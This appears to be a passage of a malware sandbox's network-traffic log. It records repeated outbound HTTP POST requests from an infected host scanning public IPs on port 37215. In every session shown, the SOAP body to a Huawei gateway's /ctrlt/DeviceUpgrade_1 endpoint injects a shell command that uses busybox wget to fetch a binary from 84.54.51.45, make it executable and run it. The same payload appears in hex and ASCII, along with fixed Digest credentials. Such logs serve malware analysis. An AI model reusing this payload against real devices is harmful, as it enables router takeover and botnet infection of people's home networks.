                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            284192.168.2.1556184197.24.16.23537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179874897 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            285192.168.2.1559076197.208.210.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179935932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            286192.168.2.1557466197.80.87.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179955959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            287192.168.2.1544542197.177.179.10937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179960966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            288192.168.2.1548516197.4.103.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179980040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            289192.168.2.1556662197.95.189.4237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180011988 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            290192.168.2.1540800197.208.242.9137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180062056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            291192.168.2.1547968197.242.90.24537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180063009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            292192.168.2.1546468197.149.11.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180084944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            293192.168.2.1544896197.117.83.2637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.180130005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 